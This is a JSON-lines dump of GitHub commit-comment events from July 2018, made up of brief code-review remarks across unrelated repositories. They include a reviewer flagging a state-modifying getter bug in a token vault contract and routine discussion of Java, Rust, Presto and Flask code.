{"id":"7982561121","type":"CommitCommentEvent","actor":{"login":"ztane"},"repo":{"name":"TokenMarketNet/ico"},"payload":{"comment":{"id":29748800,"position":55,"line":195,"path":"contracts/TokenVault.sol","commit_id":"fd773106940038b6af423ed6aa9ab1263e9be8cd","created_at":"2018-07-18T12:16:25Z","updated_at":"2018-07-18T12:16:25Z","author_association":"COLLABORATOR","body":"* function is \"constant\"  but modifies `lastClaimed[investor]`\r\n* function is *public* but modifies state without any regards to the caller\r\n* function is named as if it is a getter\r\n* any call to the `getClaimLeft` will *reset* the counter, despite any changes.\r\n* therefore anyone can call this function to ensure that an investor cannot withdraw anything."}},"created_at":"2018-07-18T12:16:25Z"}
{"id":"7982566418","type":"CommitCommentEvent","actor":{"login":"golankopi"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29748811,"position":57,"line":57,"path":"MyFlaskApp/pokemon.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-18T12:17:31Z","updated_at":"2018-07-18T12:17:31Z","author_association":"NONE","body":"please answer the first question (it wasn't a \"why\" that meant use another solution - it was a \"why\" that meant - I want to know how you did your research and what was your considerations :) )"}},"created_at":"2018-07-18T12:17:31Z"}
{"id":"7982568225","type":"CommitCommentEvent","actor":{"login":"huangfenglan"},"repo":{"name":"huangfenglan/new"},"payload":{"comment":{"id":29748812,"position":null,"line":null,"path":null,"commit_id":"65b08a157f74df5193dc716aa6f21e7c23d3da1b","created_at":"2018-07-18T12:17:53Z","updated_at":"2018-07-18T12:17:53Z","author_association":"OWNER","body":"dafs "}},"created_at":"2018-07-18T12:17:53Z"}
{"id":"7982569989","type":"CommitCommentEvent","actor":{"login":"ztane"},"repo":{"name":"TokenMarketNet/ico"},"payload":{"comment":{"id":29748814,"position":66,"line":206,"path":"contracts/TokenVault.sol","commit_id":"fd773106940038b6af423ed6aa9ab1263e9be8cd","created_at":"2018-07-18T12:18:14Z","updated_at":"2018-07-18T12:18:14Z","author_association":"COLLABORATOR","body":"if the investor doesn't claim the maximum for some reason, the counter is always reset anyway. On the other hand, there is no maximum for single withdrawal, so by just waiting then everything can be withdrawn at once. But you cannot use this function to query the amount you can withdraw because it resets the counter..."}},"created_at":"2018-07-18T12:18:14Z"}
{"id":"7982577756","type":"CommitCommentEvent","actor":{"login":"fbacchella"},"repo":{"name":"rrd4j/rrd4j"},"payload":{"comment":{"id":29748839,"position":null,"line":null,"path":null,"commit_id":"604209f01552fe5a1d24d0245257301851f0d027","created_at":"2018-07-18T12:19:51Z","updated_at":"2018-07-18T12:19:51Z","author_association":"CONTRIBUTOR","body":"A multi-release jar is a single jar with classes embeded for different versions of JVM, see https://www.javaworld.com/article/3184029/java-language/java-9s-other-new-enhancements-part-4-multi-release-jar-files.html\r\nBut I need to find a way to build that, and I have no time to investigate right now.\r\nI'm not a big fan of reflection, but sometime it's the only way to go."}},"created_at":"2018-07-18T12:19:51Z"}
{"id":"7982578229","type":"CommitCommentEvent","actor":{"login":"ulukaya"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29748840,"position":5,"line":20,"path":"mlmodelinterpreter/MLModelInterpreterExample/ViewController.swift","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-18T12:19:57Z","updated_at":"2018-07-18T12:19:57Z","author_association":"MEMBER","body":"So I can use only one storyboard for both Switch and Objc targets. We don't include this in snippets and have no value to real use cases."}},"created_at":"2018-07-18T12:19:57Z"}
{"id":"7982589647","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29748857,"position":16,"line":15,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T12:22:15Z","updated_at":"2018-07-18T12:22:15Z","author_association":"OWNER","body":"Yes I have ;-)"}},"created_at":"2018-07-18T12:22:15Z"}
{"id":"7982591897","type":"CommitCommentEvent","actor":{"login":"NadavOs90"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29748860,"position":57,"line":57,"path":"MyFlaskApp/pokemon.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-18T12:22:41Z","updated_at":"2018-07-18T12:22:41Z","author_association":"OWNER","body":"I used that search type because it searches for a prefix on all fields when I read the exercise I didn't realize that we didn't want to search in numeric fields. If you want I can change the query."}},"created_at":"2018-07-18T12:22:41Z"}
{"id":"7982626140","type":"CommitCommentEvent","actor":{"login":"rbeucher"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29748938,"position":null,"line":null,"path":null,"commit_id":"c1bd01df5b4115a4e95c4a367be1d1da40d6954b","created_at":"2018-07-18T12:29:26Z","updated_at":"2018-07-18T12:29:26Z","author_association":"CONTRIBUTOR","body":"@julesghub That works like that. It is not too ugly I think...."}},"created_at":"2018-07-18T12:29:26Z"}
{"id":"7982627355","type":"CommitCommentEvent","actor":{"login":"ZiluckMichael"},"repo":{"name":"ryceg/Eigengrau-s-Essential-Establishment-Generator"},"payload":{"comment":{"id":29748941,"position":null,"line":null,"path":null,"commit_id":"ac3b093a966faa5ee07d3650a4863279e65f2a65","created_at":"2018-07-18T12:29:41Z","updated_at":"2018-07-18T12:29:41Z","author_association":"NONE","body":"Even if you're just testing stuff, if you could make the name of things be \"test guard names\" rather than just \"test\" that would be great for other developers if they go to look at commits."}},"created_at":"2018-07-18T12:29:41Z"}
{"id":"7982633849","type":"CommitCommentEvent","actor":{"login":"fbacchella"},"repo":{"name":"rrd4j/rrd4j"},"payload":{"comment":{"id":29748956,"position":null,"line":null,"path":null,"commit_id":"604209f01552fe5a1d24d0245257301851f0d027","created_at":"2018-07-18T12:30:53Z","updated_at":"2018-07-18T12:30:53Z","author_association":"CONTRIBUTOR","body":"Indeed, both versions are hack. I wonder which one keep working with latter java releases."}},"created_at":"2018-07-18T12:30:53Z"}
{"id":"7982638990","type":"CommitCommentEvent","actor":{"login":"shiftkey"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29748966,"position":5,"line":61,"path":"app/src/lib/api.ts","commit_id":"0ddb3722f4938f41bcf200f79f63effa52fcec8a","created_at":"2018-07-18T12:31:50Z","updated_at":"2018-07-18T12:31:50Z","author_association":"MEMBER","body":"Yeah, and the TODO here is to see what organization plans are on offer too"}},"created_at":"2018-07-18T12:31:50Z"}
{"id":"7982641100","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29748968,"position":null,"line":null,"path":null,"commit_id":"cc3ff1374c90197c7e1b2d2e805925c142499a0c","created_at":"2018-07-18T12:32:14Z","updated_at":"2018-07-18T12:32:14Z","author_association":"CONTRIBUTOR","body":"@ChaeSongi 잘 정리해 주셨어요 :)"}},"created_at":"2018-07-18T12:32:14Z"}
{"id":"7982642415","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29748971,"position":null,"line":null,"path":null,"commit_id":"2d0c4fd37f5e459fee72b2a784c8fdd35d97b186","created_at":"2018-07-18T12:32:30Z","updated_at":"2018-07-18T12:32:30Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T12:32:30Z"}
{"id":"7982644556","type":"CommitCommentEvent","actor":{"login":"d3m3vilurr"},"repo":{"name":"vitasdk/vita-headers"},"payload":{"comment":{"id":29748977,"position":null,"line":null,"path":null,"commit_id":"2e2b25933597ba11512909dba659a661224629ae","created_at":"2018-07-18T12:32:55Z","updated_at":"2018-07-18T12:32:55Z","author_association":"CONTRIBUTOR","body":"so you mean, need we remove one of them?"}},"created_at":"2018-07-18T12:32:55Z"}
{"id":"7982645801","type":"CommitCommentEvent","actor":{"login":"ComiR"},"repo":{"name":"neos/redirecthandler-neosadapter"},"payload":{"comment":{"id":29748981,"position":147,"line":218,"path":"Classes/Service/NodeRedirectService.php","commit_id":"5aaecaf8a477ee25bb6c20f9ab4fa896160483c1","created_at":"2018-07-18T12:33:08Z","updated_at":"2018-07-18T12:33:08Z","author_association":"NONE","body":"Changing the method signature broke our package which extended this class and called this method.\r\n\r\nidk if I should even check for such things in a (semver) patch level update..."}},"created_at":"2018-07-18T12:33:08Z"}
{"id":"7982646720","type":"CommitCommentEvent","actor":{"login":"CelesteBlue-dev"},"repo":{"name":"vitasdk/vita-headers"},"payload":{"comment":{"id":29748985,"position":null,"line":null,"path":null,"commit_id":"2e2b25933597ba11512909dba659a661224629ae","created_at":"2018-07-18T12:33:17Z","updated_at":"2018-07-18T12:33:17Z","author_association":"CONTRIBUTOR","body":"done #335 "}},"created_at":"2018-07-18T12:33:17Z"}
{"id":"7982653849","type":"CommitCommentEvent","actor":{"login":"dholth"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29748994,"position":null,"line":null,"path":null,"commit_id":"e2b07f25197b35048fb9cd1e4ecfa1e617f78883","created_at":"2018-07-18T12:34:39Z","updated_at":"2018-07-18T12:34:39Z","author_association":"MEMBER","body":"Very nice."}},"created_at":"2018-07-18T12:34:39Z"}
{"id":"7982655335","type":"CommitCommentEvent","actor":{"login":"cmaughan"},"repo":{"name":"yorkdayofcode/yorkdayofcode.github.io"},"payload":{"comment":{"id":29748996,"position":4,"line":10,"path":"package.json","commit_id":"1f8c8c1a7efd8ef571031887c1657ec36390ca3b","created_at":"2018-07-18T12:34:56Z","updated_at":"2018-07-18T12:34:56Z","author_association":"COLLABORATOR","body":"Isn't that the point of this node/package/web stuff ;)  - to take a simple idea and make it complicated ? :)\r\nBut I was just fixing the broken build; I'm sure there's a better way of doing it...?"}},"created_at":"2018-07-18T12:34:56Z"}
{"id":"7982665868","type":"CommitCommentEvent","actor":{"login":"JackVeromeev"},"repo":{"name":"itext/itextpdf"},"payload":{"comment":{"id":29749015,"position":52,"line":52,"path":"itext/src/core/com/itextpdf/text/pdf/ICC_Profile.java","commit_id":"8b17cf45b291bc81b76c13e06aaf36702ff2f9af","created_at":"2018-07-18T12:37:03Z","updated_at":"2018-07-18T12:37:03Z","author_association":"NONE","body":"Seems this class source code contains too much \"_magic_\" numbers, doesn't it?"}},"created_at":"2018-07-18T12:37:03Z"}
{"id":"7982666473","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"TeamHorizon/android_device_xiaomi_cancro"},"payload":{"comment":{"id":29749017,"position":null,"line":null,"path":null,"commit_id":"c3b86b55d02b643fe9b3f73c6ae4c06b9d6d688c","created_at":"2018-07-18T12:37:10Z","updated_at":"2018-07-18T12:37:10Z","author_association":"MEMBER","body":"adb logcat -b all -d | audit2allow -p policy"}},"created_at":"2018-07-18T12:37:10Z"}
{"id":"7982669638","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"TeamHorizon/android_device_xiaomi_cancro"},"payload":{"comment":{"id":29749021,"position":null,"line":null,"path":null,"commit_id":"c3b86b55d02b643fe9b3f73c6ae4c06b9d6d688c","created_at":"2018-07-18T12:37:50Z","updated_at":"2018-07-18T12:37:50Z","author_association":"MEMBER","body":"sys/fs/selinux/policy\r\n"}},"created_at":"2018-07-18T12:37:50Z"}
{"id":"7982673267","type":"CommitCommentEvent","actor":{"login":"blackfence"},"repo":{"name":"blackfence/blackfence.github.io"},"payload":{"comment":{"id":29749024,"position":14,"line":14,"path":"README.md","commit_id":"70bd7b0873c274c75403e6a1730e79a756967dd4","created_at":"2018-07-18T12:38:34Z","updated_at":"2018-07-18T12:38:34Z","author_association":"OWNER","body":"sagagag"}},"created_at":"2018-07-18T12:38:34Z"}
{"id":"7982675661","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29749028,"position":14,"line":102,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T12:39:05Z","updated_at":"2018-07-18T12:39:05Z","author_association":"OWNER","body":"Fixed, thanks"}},"created_at":"2018-07-18T12:39:05Z"}
{"id":"7982676426","type":"CommitCommentEvent","actor":{"login":"cketcham"},"repo":{"name":"material-components/material-components-android"},"payload":{"comment":{"id":29749029,"position":38,"line":127,"path":"docs/getting-started.md","commit_id":"2cf1040ca8238ce927b4e2ee5ac3cc434847faab","created_at":"2018-07-18T12:39:14Z","updated_at":"2018-07-18T12:39:14Z","author_association":"CONTRIBUTOR","body":"yeah looks like that should be added to the docs. Thanks for flagging!"}},"created_at":"2018-07-18T12:39:14Z"}
{"id":"7982677685","type":"CommitCommentEvent","actor":{"login":"Abd-Elrazek"},"repo":{"name":"Abd-Elrazek/Training_Git"},"payload":{"comment":{"id":29749030,"position":2,"line":2,"path":"login.html","commit_id":"83d23509a298dee0e0e1aa75d8c8598bec6abd3b","created_at":"2018-07-18T12:39:29Z","updated_at":"2018-07-18T12:39:29Z","author_association":"OWNER","body":"any thing"}},"created_at":"2018-07-18T12:39:29Z"}
{"id":"7982678377","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29749034,"position":null,"line":null,"path":null,"commit_id":"d7e7bd5d13ee6341e0c4c21eb5870f3369837549","created_at":"2018-07-18T12:39:37Z","updated_at":"2018-07-18T12:39:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gym Owner / Gym Staff - Sort by Name, Date Joined/Date of Birth](https://trello.com/c/K7FblJXw/7-gym-owner-gym-staff-sort-by-name-date-joined-date-of-birth)"}},"created_at":"2018-07-18T12:39:37Z"}
{"id":"7982678541","type":"CommitCommentEvent","actor":{"login":"imagejan"},"repo":{"name":"imagej/tutorials"},"payload":{"comment":{"id":29749035,"position":null,"line":null,"path":null,"commit_id":"ec2bb94029485ac8be2bcfc93d4f41d6c8385434","created_at":"2018-07-18T12:39:39Z","updated_at":"2018-07-18T12:39:39Z","author_association":"MEMBER","body":"I suggest to change the title to \"Connected-Component **Analysis**\", as this is the common term (i.e. not Algorithm), see also https://en.wikipedia.org/wiki/Connected-component_labeling."}},"created_at":"2018-07-18T12:39:39Z"}
{"id":"7982680523","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29749043,"position":null,"line":null,"path":null,"commit_id":"356161b2aeed5e19f624ed084deb295a8b949b64","created_at":"2018-07-18T12:40:04Z","updated_at":"2018-07-18T12:40:04Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Style View Details Page](https://trello.com/c/bxJ2D9XZ/59-style-view-details-page)"}},"created_at":"2018-07-18T12:40:04Z"}
{"id":"7982680848","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29749045,"position":null,"line":null,"path":null,"commit_id":"7a1ac24dc30bb8e926b0bab1a1cba989a3400979","created_at":"2018-07-18T12:40:08Z","updated_at":"2018-07-18T12:40:08Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Style View Details Page](https://trello.com/c/bxJ2D9XZ/59-style-view-details-page)"}},"created_at":"2018-07-18T12:40:08Z"}
{"id":"7982681607","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29749049,"position":null,"line":null,"path":null,"commit_id":"71529aa2c82e345abedbb3a0ba2fd3b347a4f430","created_at":"2018-07-18T12:40:16Z","updated_at":"2018-07-18T12:40:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Style View Details Page](https://trello.com/c/bxJ2D9XZ/59-style-view-details-page)"}},"created_at":"2018-07-18T12:40:16Z"}
{"id":"7982682123","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29749052,"position":null,"line":null,"path":null,"commit_id":"0e2996c0e17c3b725f9fd06e35fd49d96370abac","created_at":"2018-07-18T12:40:22Z","updated_at":"2018-07-18T12:40:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Style View Details Page](https://trello.com/c/bxJ2D9XZ/59-style-view-details-page)"}},"created_at":"2018-07-18T12:40:22Z"}
{"id":"7982682573","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29749055,"position":null,"line":null,"path":null,"commit_id":"23d64439a2f0e1810b3ba859dd54e215e7661117","created_at":"2018-07-18T12:40:27Z","updated_at":"2018-07-18T12:40:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Style View Details Page](https://trello.com/c/bxJ2D9XZ/59-style-view-details-page)"}},"created_at":"2018-07-18T12:40:27Z"}
{"id":"7982683196","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29749059,"position":5,"line":181,"path":"examples/simulation.rs","commit_id":"b753b0681c08f3f2d37c5aa1fc8e02cbc51141a1","created_at":"2018-07-18T12:40:34Z","updated_at":"2018-07-18T12:40:34Z","author_association":"CONTRIBUTOR","body":"Wouldn't it be easier to make `Step` only generic in `D: DistAlgorithm` instead of `NodeUid`, `Output` and `Message` separately?"}},"created_at":"2018-07-18T12:40:34Z"}
{"id":"7982683423","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29749062,"position":null,"line":null,"path":null,"commit_id":"7cabdeed3ca51941fca3116b58d149337cefedc6","created_at":"2018-07-18T12:40:37Z","updated_at":"2018-07-18T12:40:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Style View Details Page](https://trello.com/c/bxJ2D9XZ/59-style-view-details-page)"}},"created_at":"2018-07-18T12:40:37Z"}
{"id":"7982685703","type":"CommitCommentEvent","actor":{"login":"amarzavery"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29749065,"position":10,"line":342,"path":"README.md","commit_id":"552d7f7af83dc2889cc0391104e1f4fb5ea77bfa","created_at":"2018-07-18T12:41:03Z","updated_at":"2018-07-18T12:41:03Z","author_association":"COLLABORATOR","body":"@grs > The error is available as a property on the event context.\r\nI was reading the discussion in this [issue](https://github.com/amqp/rhea/issues/74).\r\n\r\nI liked the consistent pattern of checking for error checking\r\n- context.sender.error for sender_error | sender_close event, \r\n- context.receiver.error for receiver_error | receiver_close event,\r\n- context.session.error for session_error | session_close.\r\n\r\nThe above statement and the recent commits on error handling make it a little confusing. So,\r\n- Will the error be present at  both the places `context.error and context.connection.error` for connection_error | connection_close or only at context.error for those events?\r\n- Where will the error be present for disconnected event?\r\n- Is context.error also populated for (sender|receiver|session)_error events as well? If yes then will the same error information be available at 2 places or it will be different?\r\n\r\nJust trying to make sure I understand all the cases."}},"created_at":"2018-07-18T12:41:03Z"}
{"id":"7982689853","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29749070,"position":12,"line":100,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T12:41:52Z","updated_at":"2018-07-18T12:41:52Z","author_association":"OWNER","body":"previousNode is a ProjectNode, so cannot directly cast LateralJoinNode's input to it. I have fixed it by allocating the first ProjectNode outside the loop."}},"created_at":"2018-07-18T12:41:52Z"}
{"id":"7982690772","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29749072,"position":10,"line":98,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T12:42:03Z","updated_at":"2018-07-18T12:42:03Z","author_association":"OWNER","body":"Fixed, thanks"}},"created_at":"2018-07-18T12:42:03Z"}
{"id":"7982692448","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29749077,"position":29,"line":117,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T12:42:23Z","updated_at":"2018-07-18T12:42:23Z","author_association":"OWNER","body":"I will do this as a separate PR, if that is ok"}},"created_at":"2018-07-18T12:42:23Z"}
{"id":"7982693331","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29749080,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-18T12:42:33Z","updated_at":"2018-07-18T12:42:33Z","author_association":"OWNER","body":"What have happend to `doc/typo`, i.e. where are the new features documented?"}},"created_at":"2018-07-18T12:42:33Z"}
{"id":"7982696885","type":"CommitCommentEvent","actor":{"login":"NadavOs90"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29749093,"position":2,"line":2,"path":"Theoretical-part.txt","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-18T12:43:14Z","updated_at":"2018-07-18T12:43:14Z","author_association":"OWNER","body":"In the ES configuration, I would configure a logger that sends the ES logs to the ES-DB we created for the logs.\r\nIt will be located in our cluster.\r\nIn order to log good/bad requests we can use the @app.before_request and @app.after_request to log the request and if it was good/bad and why, these logs will go to our ES-DB for logs then you could search for logs that had a typo in the url"}},"created_at":"2018-07-18T12:43:14Z"}
{"id":"7982698895","type":"CommitCommentEvent","actor":{"login":"xbulat"},"repo":{"name":"xbulat/ror_full_9"},"payload":{"comment":{"id":29749098,"position":30,"line":30,"path":"lesson1/2_right_triangle.rb","commit_id":"e5a6981bb41ef909ec96cf3b294109e0c244c11c","created_at":"2018-07-18T12:43:38Z","updated_at":"2018-07-18T12:43:38Z","author_association":"OWNER","body":"Согласен, иногда желание записать в одну строку преобладает над здравым смыслом."}},"created_at":"2018-07-18T12:43:38Z"}
{"id":"7982700221","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29749099,"position":47,"line":329,"path":"src/dynamic_honey_badger/mod.rs","commit_id":"b753b0681c08f3f2d37c5aa1fc8e02cbc51141a1","created_at":"2018-07-18T12:43:54Z","updated_at":"2018-07-18T12:43:54Z","author_association":"CONTRIBUTOR","body":"You could probably just pass ownership into the method instead of a mutable reference:\r\n\r\n```rust\r\nself.messages.extend_with_epoch(self.start_epoch, step.messages);\r\n```"}},"created_at":"2018-07-18T12:43:54Z"}
{"id":"7982702204","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29749102,"position":56,"line":396,"path":"src/dynamic_honey_badger/mod.rs","commit_id":"b753b0681c08f3f2d37c5aa1fc8e02cbc51141a1","created_at":"2018-07-18T12:44:17Z","updated_at":"2018-07-18T12:44:17Z","author_association":"CONTRIBUTOR","body":"That should always be empty now, I think."}},"created_at":"2018-07-18T12:44:17Z"}
{"id":"7982702742","type":"CommitCommentEvent","actor":{"login":"knstvk"},"repo":{"name":"cuba-platform/documentation"},"payload":{"comment":{"id":29749103,"position":6,"line":6,"path":"content/manual/source/features/entity_snapshots_view.java","commit_id":"5c6241793687ecfe52cb8bee88308d76b0c659cf","created_at":"2018-07-18T12:44:24Z","updated_at":"2018-07-18T12:44:24Z","author_association":"MEMBER","body":"Make both fields private plz."}},"created_at":"2018-07-18T12:44:24Z"}
{"id":"7982702865","type":"CommitCommentEvent","actor":{"login":"palinek"},"repo":{"name":"palinek/pvr.sledovanitv.cz"},"payload":{"comment":{"id":29749104,"position":null,"line":null,"path":null,"commit_id":"0f46e1e9703ff9f3ebbe46a0042c51e626f052b8","created_at":"2018-07-18T12:44:25Z","updated_at":"2018-07-18T12:44:25Z","author_association":"OWNER","body":"> You should increase the addon version number whenever you commit something to master.\r\n\r\n> Remember, once your PR to include your addon in kodi addon repository got merged, the latest master of your addon will be pulled automatically for every kodi nightly build. To support your users it's best to have unique version numbers.\r\n\r\nVersion increase done. I'll remember that."}},"created_at":"2018-07-18T12:44:25Z"}
{"id":"7982713740","type":"CommitCommentEvent","actor":{"login":"mihapain1"},"repo":{"name":"mihapain1/MultiMC5-translate"},"payload":{"comment":{"id":29749125,"position":null,"line":null,"path":null,"commit_id":"920014dd5a7c8fcf47ca91c9f98d0b0773d7d5f6","created_at":"2018-07-18T12:46:29Z","updated_at":"2018-07-18T12:46:29Z","author_association":"OWNER","body":"Small update and fix Russian translation"}},"created_at":"2018-07-18T12:46:29Z"}
{"id":"7982718940","type":"CommitCommentEvent","actor":{"login":"SandraFortini"},"repo":{"name":"SandraFortini/RepGitSandra"},"payload":{"comment":{"id":29749133,"position":null,"line":null,"path":null,"commit_id":"5da3864f2d989539d04adaf7d2be7b1db8485691","created_at":"2018-07-18T12:47:28Z","updated_at":"2018-07-18T12:47:28Z","author_association":"OWNER","body":"hhhhh"}},"created_at":"2018-07-18T12:47:28Z"}
{"id":"7982721478","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29749137,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-18T12:47:57Z","updated_at":"2018-07-18T12:47:57Z","author_association":"OWNER","body":"Ah I remember we had removed it because I did not like to have generated documents in the repo (except for regression test purposes). But I'd like to have the source code of the documents in the repo. (The generated PDFs could then be on a page like http://n-t-roff.github.io/heirloom/doctools.html.)\r\n\r\n(I'm planning to do a release of the n-t-roff repo with the new features.)"}},"created_at":"2018-07-18T12:47:57Z"}
{"id":"7982721893","type":"CommitCommentEvent","actor":{"login":"DwarfMason"},"repo":{"name":"DwarfMason/Dragon-Shore"},"payload":{"comment":{"id":29749138,"position":311,"line":311,"path":"tiles.js","commit_id":"85602161cb918862453e67b314f0a40bd0450e58","created_at":"2018-07-18T12:48:02Z","updated_at":"2018-07-18T12:48:02Z","author_association":"OWNER","body":"Комментарии в 150 строк - а это зачем?"}},"created_at":"2018-07-18T12:48:02Z"}
{"id":"7982723552","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29749140,"position":31,"line":119,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T12:48:20Z","updated_at":"2018-07-18T12:48:20Z","author_association":"OWNER","body":"Fixed, thanks"}},"created_at":"2018-07-18T12:48:20Z"}
{"id":"7982724453","type":"CommitCommentEvent","actor":{"login":"NadavOs90"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29749143,"position":9,"line":9,"path":"Theoretical-part.txt","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-18T12:48:30Z","updated_at":"2018-07-18T12:48:30Z","author_association":"OWNER","body":"All requests from all api servers would enter a queue. A load balancer would read each request determine what kind of callback function to create and put it in a new queue, this new queue is for our worker nodes that execute the callback and send the response back to the client. "}},"created_at":"2018-07-18T12:48:30Z"}
{"id":"7982730845","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29749155,"position":5,"line":69,"path":"subprojects/provider/provider.gradle.kts","commit_id":"3aea9360ebd02764d7f262657681b0b8f220c022","created_at":"2018-07-18T12:49:41Z","updated_at":"2018-07-18T12:49:41Z","author_association":"MEMBER","body":"A comment with the commit message explanation here would be useful."}},"created_at":"2018-07-18T12:49:41Z"}
{"id":"7982736751","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29749172,"position":4,"line":4,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T12:50:46Z","updated_at":"2018-07-18T12:50:46Z","author_association":"OWNER","body":"var myvar"}},"created_at":"2018-07-18T12:50:46Z"}
{"id":"7982741386","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29749184,"position":8,"line":8,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T12:51:37Z","updated_at":"2018-07-18T12:51:37Z","author_association":"OWNER","body":"var myvar = 10"}},"created_at":"2018-07-18T12:51:37Z"}
